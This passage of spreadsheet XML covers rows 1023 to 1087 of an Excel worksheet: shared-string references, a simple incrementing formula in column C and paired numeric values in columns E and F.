    <row r="1023" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1023" t="s">
        <v>1966</v>
      </c>
      <c r="B1023" t="s">
        <v>1967</v>
      </c>
      <c r="C1023">
        <f t="shared" si="15"/>
        <v>10710754</v>
      </c>
      <c r="D1023" t="s">
        <v>1969</v>
      </c>
      <c r="E1023">
        <v>9.9558620452880859</v>
      </c>
      <c r="F1023">
        <v>2</v>
      </c>
    </row>
    <row r="1024" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1024" t="s">
        <v>1970</v>
      </c>
      <c r="B1024" t="s">
        <v>1971</v>
      </c>
      <c r="C1024">
        <f t="shared" si="15"/>
        <v>10712007</v>
      </c>
      <c r="D1024" t="s">
        <v>1972</v>
      </c>
      <c r="E1024">
        <v>16.703952789306641</v>
      </c>
      <c r="F1024">
        <v>1</v>
      </c>
    </row>
    <row r="1025" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1025" t="s">
        <v>1970</v>
      </c>
      <c r="B1025" t="s">
        <v>1971</v>
      </c>
      <c r="C1025">
        <f t="shared" si="15"/>
        <v>10713260</v>
      </c>
      <c r="D1025" t="s">
        <v>1973</v>
      </c>
      <c r="E1025">
        <v>16.562038421630859</v>
      </c>
      <c r="F1025">
        <v>2</v>
      </c>
    </row>
    <row r="1026" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1026" t="s">
        <v>1974</v>
      </c>
      <c r="B1026" t="s">
        <v>1975</v>
      </c>
      <c r="C1026">
        <f t="shared" si="15"/>
        <v>10714513</v>
      </c>
      <c r="D1026" t="s">
        <v>1976</v>
      </c>
      <c r="E1026">
        <v>31.201686859130859</v>
      </c>
      <c r="F1026">
        <v>1</v>
      </c>
    </row>
    <row r="1027" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1027" t="s">
        <v>1974</v>
      </c>
      <c r="B1027" t="s">
        <v>1975</v>
      </c>
      <c r="C1027">
        <f t="shared" si="15"/>
        <v>10715766</v>
      </c>
      <c r="D1027" t="s">
        <v>1977</v>
      </c>
      <c r="E1027">
        <v>5.2579035758972168</v>
      </c>
      <c r="F1027">
        <v>2</v>
      </c>
    </row>
    <row r="1028" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1028" t="s">
        <v>1978</v>
      </c>
      <c r="B1028" t="s">
        <v>1979</v>
      </c>
      <c r="C1028">
        <f t="shared" si="15"/>
        <v>10717019</v>
      </c>
      <c r="D1028" t="s">
        <v>1980</v>
      </c>
      <c r="E1028">
        <v>30.656087875366211</v>
      </c>
      <c r="F1028">
        <v>1</v>
      </c>
    </row>
    <row r="1029" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1029" t="s">
        <v>1978</v>
      </c>
      <c r="B1029" t="s">
        <v>1979</v>
      </c>
      <c r="C1029">
        <f t="shared" si="15"/>
        <v>10718272</v>
      </c>
      <c r="D1029" t="s">
        <v>1981</v>
      </c>
      <c r="E1029">
        <v>6.0940580442547798E-4</v>
      </c>
      <c r="F1029">
        <v>2</v>
      </c>
    </row>
    <row r="1030" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1030" t="s">
        <v>1982</v>
      </c>
      <c r="B1030" t="s">
        <v>1983</v>
      </c>
      <c r="C1030">
        <f t="shared" si="15"/>
        <v>10719525</v>
      </c>
      <c r="D1030" t="s">
        <v>1984</v>
      </c>
      <c r="E1030">
        <v>32.237873077392578</v>
      </c>
      <c r="F1030">
        <v>1</v>
      </c>
    </row>
    <row r="1031" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1031" t="s">
        <v>1982</v>
      </c>
      <c r="B1031" t="s">
        <v>1983</v>
      </c>
      <c r="C1031">
        <f t="shared" si="15"/>
        <v>10720778</v>
      </c>
      <c r="D1031" t="s">
        <v>1985</v>
      </c>
      <c r="E1031">
        <v>2.7191867828369141</v>
      </c>
      <c r="F1031">
        <v>2</v>
      </c>
    </row>
    <row r="1032" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1032" t="s">
        <v>1986</v>
      </c>
      <c r="B1032" t="s">
        <v>1987</v>
      </c>
      <c r="C1032">
        <f t="shared" si="15"/>
        <v>10722031</v>
      </c>
      <c r="D1032" t="s">
        <v>1988</v>
      </c>
      <c r="E1032">
        <v>28.003631591796879</v>
      </c>
      <c r="F1032">
        <v>1</v>
      </c>
    </row>
    <row r="1033" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1033" t="s">
        <v>1986</v>
      </c>
      <c r="B1033" t="s">
        <v>1987</v>
      </c>
      <c r="C1033">
        <f t="shared" si="15"/>
        <v>10723284</v>
      </c>
      <c r="D1033" t="s">
        <v>1989</v>
      </c>
      <c r="E1033">
        <v>4.2410092353820801</v>
      </c>
      <c r="F1033">
        <v>2</v>
      </c>
    </row>
    <row r="1034" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1034" t="s">
        <v>1990</v>
      </c>
      <c r="B1034" t="s">
        <v>1991</v>
      </c>
      <c r="C1034">
        <f t="shared" ref="C1034:C1097" si="16">C1033+1253</f>
        <v>10724537</v>
      </c>
      <c r="D1034" t="s">
        <v>1992</v>
      </c>
      <c r="E1034">
        <v>29.734329223632809</v>
      </c>
      <c r="F1034">
        <v>1</v>
      </c>
    </row>
    <row r="1035" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1035" t="s">
        <v>1990</v>
      </c>
      <c r="B1035" t="s">
        <v>1991</v>
      </c>
      <c r="C1035">
        <f t="shared" si="16"/>
        <v>10725790</v>
      </c>
      <c r="D1035" t="s">
        <v>1993</v>
      </c>
      <c r="E1035">
        <v>2.218066930770874</v>
      </c>
      <c r="F1035">
        <v>2</v>
      </c>
    </row>
    <row r="1036" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1036" t="s">
        <v>1994</v>
      </c>
      <c r="B1036" t="s">
        <v>1995</v>
      </c>
      <c r="C1036">
        <f t="shared" si="16"/>
        <v>10727043</v>
      </c>
      <c r="D1036" t="s">
        <v>1996</v>
      </c>
      <c r="E1036">
        <v>22.131753921508789</v>
      </c>
      <c r="F1036">
        <v>1</v>
      </c>
    </row>
    <row r="1037" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1037" t="s">
        <v>1994</v>
      </c>
      <c r="B1037" t="s">
        <v>1995</v>
      </c>
      <c r="C1037">
        <f t="shared" si="16"/>
        <v>10728296</v>
      </c>
      <c r="D1037" t="s">
        <v>1997</v>
      </c>
      <c r="E1037">
        <v>0.49487081170082092</v>
      </c>
      <c r="F1037">
        <v>2</v>
      </c>
    </row>
    <row r="1038" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1038" t="s">
        <v>1998</v>
      </c>
      <c r="B1038" t="s">
        <v>1999</v>
      </c>
      <c r="C1038">
        <f t="shared" si="16"/>
        <v>10729549</v>
      </c>
      <c r="D1038" t="s">
        <v>2000</v>
      </c>
      <c r="E1038">
        <v>31.35646820068359</v>
      </c>
      <c r="F1038">
        <v>1</v>
      </c>
    </row>
    <row r="1039" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1039" t="s">
        <v>1998</v>
      </c>
      <c r="B1039" t="s">
        <v>1999</v>
      </c>
      <c r="C1039">
        <f t="shared" si="16"/>
        <v>10730802</v>
      </c>
      <c r="D1039" t="s">
        <v>2001</v>
      </c>
      <c r="E1039">
        <v>10.14611911773682</v>
      </c>
      <c r="F1039">
        <v>2</v>
      </c>
    </row>
    <row r="1040" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1040" t="s">
        <v>2002</v>
      </c>
      <c r="B1040" t="s">
        <v>2003</v>
      </c>
      <c r="C1040">
        <f t="shared" si="16"/>
        <v>10732055</v>
      </c>
      <c r="D1040" t="s">
        <v>2004</v>
      </c>
      <c r="E1040">
        <v>29.450727462768551</v>
      </c>
      <c r="F1040">
        <v>1</v>
      </c>
    </row>
    <row r="1041" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1041" t="s">
        <v>2002</v>
      </c>
      <c r="B1041" t="s">
        <v>2003</v>
      </c>
      <c r="C1041">
        <f t="shared" si="16"/>
        <v>10733308</v>
      </c>
      <c r="D1041" t="s">
        <v>2005</v>
      </c>
      <c r="E1041">
        <v>9.5019321441650391</v>
      </c>
      <c r="F1041">
        <v>2</v>
      </c>
    </row>
    <row r="1042" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1042" t="s">
        <v>2006</v>
      </c>
      <c r="B1042" t="s">
        <v>2007</v>
      </c>
      <c r="C1042">
        <f t="shared" si="16"/>
        <v>10734561</v>
      </c>
      <c r="D1042" t="s">
        <v>1980</v>
      </c>
      <c r="E1042">
        <v>31.043144226074219</v>
      </c>
      <c r="F1042">
        <v>1</v>
      </c>
    </row>
    <row r="1043" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1043" t="s">
        <v>2006</v>
      </c>
      <c r="B1043" t="s">
        <v>2007</v>
      </c>
      <c r="C1043">
        <f t="shared" si="16"/>
        <v>10735814</v>
      </c>
      <c r="D1043" t="s">
        <v>2008</v>
      </c>
      <c r="E1043">
        <v>13.42131996154785</v>
      </c>
      <c r="F1043">
        <v>2</v>
      </c>
    </row>
    <row r="1044" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1044" t="s">
        <v>2009</v>
      </c>
      <c r="B1044" t="s">
        <v>2010</v>
      </c>
      <c r="C1044">
        <f t="shared" si="16"/>
        <v>10737067</v>
      </c>
      <c r="D1044" t="s">
        <v>2011</v>
      </c>
      <c r="E1044">
        <v>31.862422943115231</v>
      </c>
      <c r="F1044">
        <v>1</v>
      </c>
    </row>
    <row r="1045" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1045" t="s">
        <v>2009</v>
      </c>
      <c r="B1045" t="s">
        <v>2010</v>
      </c>
      <c r="C1045">
        <f t="shared" si="16"/>
        <v>10738320</v>
      </c>
      <c r="D1045" t="s">
        <v>2012</v>
      </c>
      <c r="E1045">
        <v>7.5104959309101105E-2</v>
      </c>
      <c r="F1045">
        <v>2</v>
      </c>
    </row>
    <row r="1046" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1046" t="s">
        <v>2013</v>
      </c>
      <c r="B1046" t="s">
        <v>2014</v>
      </c>
      <c r="C1046">
        <f t="shared" si="16"/>
        <v>10739573</v>
      </c>
      <c r="D1046" t="s">
        <v>2015</v>
      </c>
      <c r="E1046">
        <v>25.254022598266602</v>
      </c>
      <c r="F1046">
        <v>1</v>
      </c>
    </row>
    <row r="1047" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1047" t="s">
        <v>2013</v>
      </c>
      <c r="B1047" t="s">
        <v>2014</v>
      </c>
      <c r="C1047">
        <f t="shared" si="16"/>
        <v>10740826</v>
      </c>
      <c r="D1047" t="s">
        <v>2016</v>
      </c>
      <c r="E1047">
        <v>10.579555511474609</v>
      </c>
      <c r="F1047">
        <v>2</v>
      </c>
    </row>
    <row r="1048" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1048" t="s">
        <v>2017</v>
      </c>
      <c r="B1048" t="s">
        <v>2018</v>
      </c>
      <c r="C1048">
        <f t="shared" si="16"/>
        <v>10742079</v>
      </c>
      <c r="D1048" t="s">
        <v>2019</v>
      </c>
      <c r="E1048">
        <v>13.51014614105225</v>
      </c>
      <c r="F1048">
        <v>1</v>
      </c>
    </row>
    <row r="1049" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1049" t="s">
        <v>2017</v>
      </c>
      <c r="B1049" t="s">
        <v>2018</v>
      </c>
      <c r="C1049">
        <f t="shared" si="16"/>
        <v>10743332</v>
      </c>
      <c r="D1049" t="s">
        <v>2020</v>
      </c>
      <c r="E1049">
        <v>8.1651449203491211</v>
      </c>
      <c r="F1049">
        <v>2</v>
      </c>
    </row>
    <row r="1050" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1050" t="s">
        <v>2021</v>
      </c>
      <c r="B1050" t="s">
        <v>2022</v>
      </c>
      <c r="C1050">
        <f t="shared" si="16"/>
        <v>10744585</v>
      </c>
      <c r="D1050" t="s">
        <v>2023</v>
      </c>
      <c r="E1050">
        <v>29.000822067260739</v>
      </c>
      <c r="F1050">
        <v>1</v>
      </c>
    </row>
    <row r="1051" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1051" t="s">
        <v>2021</v>
      </c>
      <c r="B1051" t="s">
        <v>2022</v>
      </c>
      <c r="C1051">
        <f t="shared" si="16"/>
        <v>10745838</v>
      </c>
      <c r="D1051" t="s">
        <v>2024</v>
      </c>
      <c r="E1051">
        <v>11.64726734161377</v>
      </c>
      <c r="F1051">
        <v>2</v>
      </c>
    </row>
    <row r="1052" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1052" t="s">
        <v>2025</v>
      </c>
      <c r="B1052" t="s">
        <v>2026</v>
      </c>
      <c r="C1052">
        <f t="shared" si="16"/>
        <v>10747091</v>
      </c>
      <c r="D1052" t="s">
        <v>2027</v>
      </c>
      <c r="E1052">
        <v>28.602680206298832</v>
      </c>
      <c r="F1052">
        <v>1</v>
      </c>
    </row>
    <row r="1053" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1053" t="s">
        <v>2025</v>
      </c>
      <c r="B1053" t="s">
        <v>2026</v>
      </c>
      <c r="C1053">
        <f t="shared" si="16"/>
        <v>10748344</v>
      </c>
      <c r="D1053" t="s">
        <v>2028</v>
      </c>
      <c r="E1053">
        <v>1.0226988792419429</v>
      </c>
      <c r="F1053">
        <v>2</v>
      </c>
    </row>
    <row r="1054" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1054" t="s">
        <v>2029</v>
      </c>
      <c r="B1054" t="s">
        <v>2030</v>
      </c>
      <c r="C1054">
        <f t="shared" si="16"/>
        <v>10749597</v>
      </c>
      <c r="D1054" t="s">
        <v>2031</v>
      </c>
      <c r="E1054">
        <v>42.614498138427727</v>
      </c>
      <c r="F1054">
        <v>1</v>
      </c>
    </row>
    <row r="1055" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1055" t="s">
        <v>2029</v>
      </c>
      <c r="B1055" t="s">
        <v>2030</v>
      </c>
      <c r="C1055">
        <f t="shared" si="16"/>
        <v>10750850</v>
      </c>
      <c r="D1055" t="s">
        <v>2032</v>
      </c>
      <c r="E1055">
        <v>7.0090398788452148</v>
      </c>
      <c r="F1055">
        <v>2</v>
      </c>
    </row>
    <row r="1056" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1056" t="s">
        <v>2033</v>
      </c>
      <c r="B1056" t="s">
        <v>2034</v>
      </c>
      <c r="C1056">
        <f t="shared" si="16"/>
        <v>10752103</v>
      </c>
      <c r="D1056" t="s">
        <v>2035</v>
      </c>
      <c r="E1056">
        <v>24.461660385131839</v>
      </c>
      <c r="F1056">
        <v>1</v>
      </c>
    </row>
    <row r="1057" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1057" t="s">
        <v>2033</v>
      </c>
      <c r="B1057" t="s">
        <v>2034</v>
      </c>
      <c r="C1057">
        <f t="shared" si="16"/>
        <v>10753356</v>
      </c>
      <c r="D1057" t="s">
        <v>2036</v>
      </c>
      <c r="E1057">
        <v>3.1418542861938481</v>
      </c>
      <c r="F1057">
        <v>2</v>
      </c>
    </row>
    <row r="1058" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1058" t="s">
        <v>2037</v>
      </c>
      <c r="B1058" t="s">
        <v>2038</v>
      </c>
      <c r="C1058">
        <f t="shared" si="16"/>
        <v>10754609</v>
      </c>
      <c r="D1058" t="s">
        <v>2039</v>
      </c>
      <c r="E1058">
        <v>28.09821891784668</v>
      </c>
      <c r="F1058">
        <v>1</v>
      </c>
    </row>
    <row r="1059" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1059" t="s">
        <v>2037</v>
      </c>
      <c r="B1059" t="s">
        <v>2038</v>
      </c>
      <c r="C1059">
        <f t="shared" si="16"/>
        <v>10755862</v>
      </c>
      <c r="D1059" t="s">
        <v>2040</v>
      </c>
      <c r="E1059">
        <v>0.34548234939575201</v>
      </c>
      <c r="F1059">
        <v>2</v>
      </c>
    </row>
    <row r="1060" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1060" t="s">
        <v>2041</v>
      </c>
      <c r="B1060" t="s">
        <v>2042</v>
      </c>
      <c r="C1060">
        <f t="shared" si="16"/>
        <v>10757115</v>
      </c>
      <c r="D1060" t="s">
        <v>2043</v>
      </c>
      <c r="E1060">
        <v>30.500478744506839</v>
      </c>
      <c r="F1060">
        <v>1</v>
      </c>
    </row>
    <row r="1061" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1061" t="s">
        <v>2041</v>
      </c>
      <c r="B1061" t="s">
        <v>2042</v>
      </c>
      <c r="C1061">
        <f t="shared" si="16"/>
        <v>10758368</v>
      </c>
      <c r="D1061" t="s">
        <v>2044</v>
      </c>
      <c r="E1061">
        <v>4.0070552825927734</v>
      </c>
      <c r="F1061">
        <v>2</v>
      </c>
    </row>
    <row r="1062" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1062" t="s">
        <v>2045</v>
      </c>
      <c r="B1062" t="s">
        <v>2046</v>
      </c>
      <c r="C1062">
        <f t="shared" si="16"/>
        <v>10759621</v>
      </c>
      <c r="D1062" t="s">
        <v>2047</v>
      </c>
      <c r="E1062">
        <v>29.115079879760739</v>
      </c>
      <c r="F1062">
        <v>1</v>
      </c>
    </row>
    <row r="1063" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1063" t="s">
        <v>2045</v>
      </c>
      <c r="B1063" t="s">
        <v>2046</v>
      </c>
      <c r="C1063">
        <f t="shared" si="16"/>
        <v>10760874</v>
      </c>
      <c r="D1063" t="s">
        <v>2048</v>
      </c>
      <c r="E1063">
        <v>3.6141224205493927E-2</v>
      </c>
      <c r="F1063">
        <v>2</v>
      </c>
    </row>
    <row r="1064" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1064" t="s">
        <v>2049</v>
      </c>
      <c r="B1064" t="s">
        <v>2050</v>
      </c>
      <c r="C1064">
        <f t="shared" si="16"/>
        <v>10762127</v>
      </c>
      <c r="D1064" t="s">
        <v>2051</v>
      </c>
      <c r="E1064">
        <v>30.911197662353519</v>
      </c>
      <c r="F1064">
        <v>1</v>
      </c>
    </row>
    <row r="1065" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1065" t="s">
        <v>2049</v>
      </c>
      <c r="B1065" t="s">
        <v>2050</v>
      </c>
      <c r="C1065">
        <f t="shared" si="16"/>
        <v>10763380</v>
      </c>
      <c r="D1065" t="s">
        <v>2052</v>
      </c>
      <c r="E1065">
        <v>8.9267559815198183E-5</v>
      </c>
      <c r="F1065">
        <v>2</v>
      </c>
    </row>
    <row r="1066" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1066" t="s">
        <v>2053</v>
      </c>
      <c r="B1066" t="s">
        <v>2054</v>
      </c>
      <c r="C1066">
        <f t="shared" si="16"/>
        <v>10764633</v>
      </c>
      <c r="D1066" t="s">
        <v>2055</v>
      </c>
      <c r="E1066">
        <v>28.63407135009766</v>
      </c>
      <c r="F1066">
        <v>1</v>
      </c>
    </row>
    <row r="1067" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1067" t="s">
        <v>2053</v>
      </c>
      <c r="B1067" t="s">
        <v>2054</v>
      </c>
      <c r="C1067">
        <f t="shared" si="16"/>
        <v>10765886</v>
      </c>
      <c r="D1067" t="s">
        <v>2056</v>
      </c>
      <c r="E1067">
        <v>6.7468781471252441</v>
      </c>
      <c r="F1067">
        <v>2</v>
      </c>
    </row>
    <row r="1068" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1068" t="s">
        <v>2057</v>
      </c>
      <c r="B1068" t="s">
        <v>2058</v>
      </c>
      <c r="C1068">
        <f t="shared" si="16"/>
        <v>10767139</v>
      </c>
      <c r="D1068" t="s">
        <v>2059</v>
      </c>
      <c r="E1068">
        <v>28.597087860107418</v>
      </c>
      <c r="F1068">
        <v>1</v>
      </c>
    </row>
    <row r="1069" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1069" t="s">
        <v>2057</v>
      </c>
      <c r="B1069" t="s">
        <v>2058</v>
      </c>
      <c r="C1069">
        <f t="shared" si="16"/>
        <v>10768392</v>
      </c>
      <c r="D1069" t="s">
        <v>2060</v>
      </c>
      <c r="E1069">
        <v>10.728927612304689</v>
      </c>
      <c r="F1069">
        <v>2</v>
      </c>
    </row>
    <row r="1070" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1070" t="s">
        <v>2061</v>
      </c>
      <c r="B1070" t="s">
        <v>2062</v>
      </c>
      <c r="C1070">
        <f t="shared" si="16"/>
        <v>10769645</v>
      </c>
      <c r="D1070" t="s">
        <v>2063</v>
      </c>
      <c r="E1070">
        <v>35.899627685546882</v>
      </c>
      <c r="F1070">
        <v>1</v>
      </c>
    </row>
    <row r="1071" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1071" t="s">
        <v>2061</v>
      </c>
      <c r="B1071" t="s">
        <v>2062</v>
      </c>
      <c r="C1071">
        <f t="shared" si="16"/>
        <v>10770898</v>
      </c>
      <c r="D1071" t="s">
        <v>2064</v>
      </c>
      <c r="E1071">
        <v>2.0390100479125981</v>
      </c>
      <c r="F1071">
        <v>2</v>
      </c>
    </row>
    <row r="1072" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1072" t="s">
        <v>2065</v>
      </c>
      <c r="B1072" t="s">
        <v>2066</v>
      </c>
      <c r="C1072">
        <f t="shared" si="16"/>
        <v>10772151</v>
      </c>
      <c r="D1072" t="s">
        <v>2067</v>
      </c>
      <c r="E1072">
        <v>30.10429573059082</v>
      </c>
      <c r="F1072">
        <v>1</v>
      </c>
    </row>
    <row r="1073" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1073" t="s">
        <v>2065</v>
      </c>
      <c r="B1073" t="s">
        <v>2066</v>
      </c>
      <c r="C1073">
        <f t="shared" si="16"/>
        <v>10773404</v>
      </c>
      <c r="D1073" t="s">
        <v>2068</v>
      </c>
      <c r="E1073">
        <v>6.2636013031005859</v>
      </c>
      <c r="F1073">
        <v>2</v>
      </c>
    </row>
    <row r="1074" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1074" t="s">
        <v>2069</v>
      </c>
      <c r="B1074" t="s">
        <v>2070</v>
      </c>
      <c r="C1074">
        <f t="shared" si="16"/>
        <v>10774657</v>
      </c>
      <c r="D1074" t="s">
        <v>2071</v>
      </c>
      <c r="E1074">
        <v>30.980686187744141</v>
      </c>
      <c r="F1074">
        <v>1</v>
      </c>
    </row>
    <row r="1075" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1075" t="s">
        <v>2069</v>
      </c>
      <c r="B1075" t="s">
        <v>2070</v>
      </c>
      <c r="C1075">
        <f t="shared" si="16"/>
        <v>10775910</v>
      </c>
      <c r="D1075" t="s">
        <v>2072</v>
      </c>
      <c r="E1075">
        <v>10.178018569946291</v>
      </c>
      <c r="F1075">
        <v>2</v>
      </c>
    </row>
    <row r="1076" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1076" t="s">
        <v>2073</v>
      </c>
      <c r="B1076" t="s">
        <v>2074</v>
      </c>
      <c r="C1076">
        <f t="shared" si="16"/>
        <v>10777163</v>
      </c>
      <c r="D1076" t="s">
        <v>2075</v>
      </c>
      <c r="E1076">
        <v>31.585264205932621</v>
      </c>
      <c r="F1076">
        <v>1</v>
      </c>
    </row>
    <row r="1077" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1077" t="s">
        <v>2073</v>
      </c>
      <c r="B1077" t="s">
        <v>2074</v>
      </c>
      <c r="C1077">
        <f t="shared" si="16"/>
        <v>10778416</v>
      </c>
      <c r="D1077" t="s">
        <v>2076</v>
      </c>
      <c r="E1077">
        <v>8.0658855438232422</v>
      </c>
      <c r="F1077">
        <v>2</v>
      </c>
    </row>
    <row r="1078" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1078" t="s">
        <v>2077</v>
      </c>
      <c r="B1078" t="s">
        <v>2078</v>
      </c>
      <c r="C1078">
        <f t="shared" si="16"/>
        <v>10779669</v>
      </c>
      <c r="D1078" t="s">
        <v>2079</v>
      </c>
      <c r="E1078">
        <v>28.177793502807621</v>
      </c>
      <c r="F1078">
        <v>1</v>
      </c>
    </row>
    <row r="1079" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1079" t="s">
        <v>2077</v>
      </c>
      <c r="B1079" t="s">
        <v>2078</v>
      </c>
      <c r="C1079">
        <f t="shared" si="16"/>
        <v>10780922</v>
      </c>
      <c r="D1079" t="s">
        <v>2080</v>
      </c>
      <c r="E1079">
        <v>9.4662837982177734</v>
      </c>
      <c r="F1079">
        <v>2</v>
      </c>
    </row>
    <row r="1080" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1080" t="s">
        <v>2081</v>
      </c>
      <c r="B1080" t="s">
        <v>2082</v>
      </c>
      <c r="C1080">
        <f t="shared" si="16"/>
        <v>10782175</v>
      </c>
      <c r="D1080" t="s">
        <v>2083</v>
      </c>
      <c r="E1080">
        <v>25.925607681274411</v>
      </c>
      <c r="F1080">
        <v>1</v>
      </c>
    </row>
    <row r="1081" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1081" t="s">
        <v>2081</v>
      </c>
      <c r="B1081" t="s">
        <v>2082</v>
      </c>
      <c r="C1081">
        <f t="shared" si="16"/>
        <v>10783428</v>
      </c>
      <c r="D1081" t="s">
        <v>2084</v>
      </c>
      <c r="E1081">
        <v>9.8818391561508179E-3</v>
      </c>
      <c r="F1081">
        <v>2</v>
      </c>
    </row>
    <row r="1082" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1082" t="s">
        <v>2085</v>
      </c>
      <c r="B1082" t="s">
        <v>2086</v>
      </c>
      <c r="C1082">
        <f t="shared" si="16"/>
        <v>10784681</v>
      </c>
      <c r="D1082" t="s">
        <v>2087</v>
      </c>
      <c r="E1082">
        <v>19.82573127746582</v>
      </c>
      <c r="F1082">
        <v>1</v>
      </c>
    </row>
    <row r="1083" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1083" t="s">
        <v>2085</v>
      </c>
      <c r="B1083" t="s">
        <v>2086</v>
      </c>
      <c r="C1083">
        <f t="shared" si="16"/>
        <v>10785934</v>
      </c>
      <c r="D1083" t="s">
        <v>2088</v>
      </c>
      <c r="E1083">
        <v>1.299096822738647</v>
      </c>
      <c r="F1083">
        <v>2</v>
      </c>
    </row>
    <row r="1084" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1084" t="s">
        <v>2089</v>
      </c>
      <c r="B1084" t="s">
        <v>2090</v>
      </c>
      <c r="C1084">
        <f t="shared" si="16"/>
        <v>10787187</v>
      </c>
      <c r="D1084" t="s">
        <v>2091</v>
      </c>
      <c r="E1084">
        <v>41.075336456298828</v>
      </c>
      <c r="F1084">
        <v>1</v>
      </c>
    </row>
    <row r="1085" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1085" t="s">
        <v>2089</v>
      </c>
      <c r="B1085" t="s">
        <v>2090</v>
      </c>
      <c r="C1085">
        <f t="shared" si="16"/>
        <v>10788440</v>
      </c>
      <c r="D1085" t="s">
        <v>2092</v>
      </c>
      <c r="E1085">
        <v>5.7356119155883789</v>
      </c>
      <c r="F1085">
        <v>2</v>
      </c>
    </row>
    <row r="1086" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1086" t="s">
        <v>2093</v>
      </c>
      <c r="B1086" t="s">
        <v>2094</v>
      </c>
      <c r="C1086">
        <f t="shared" si="16"/>
        <v>10789693</v>
      </c>
      <c r="D1086" t="s">
        <v>2095</v>
      </c>
      <c r="E1086">
        <v>21.2734260559082</v>
      </c>
      <c r="F1086">
        <v>1</v>
      </c>
    </row>
    <row r="1087" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1087" t="s">
        <v>2093</v>
      </c>
      <c r="B1087" t="s">
        <v>2094</v>
      </c>
      <c r="C1087">
        <f t="shared" si="16"/>
        <v>10790946</v>
      </c>
      <c r="D1087" t="s">
        <v>2096</v>
      </c>
      <c r="E1087">
        <v>7.8923568725585938</v>
      </c>
      <c r="F1087">
        <v>2</v>
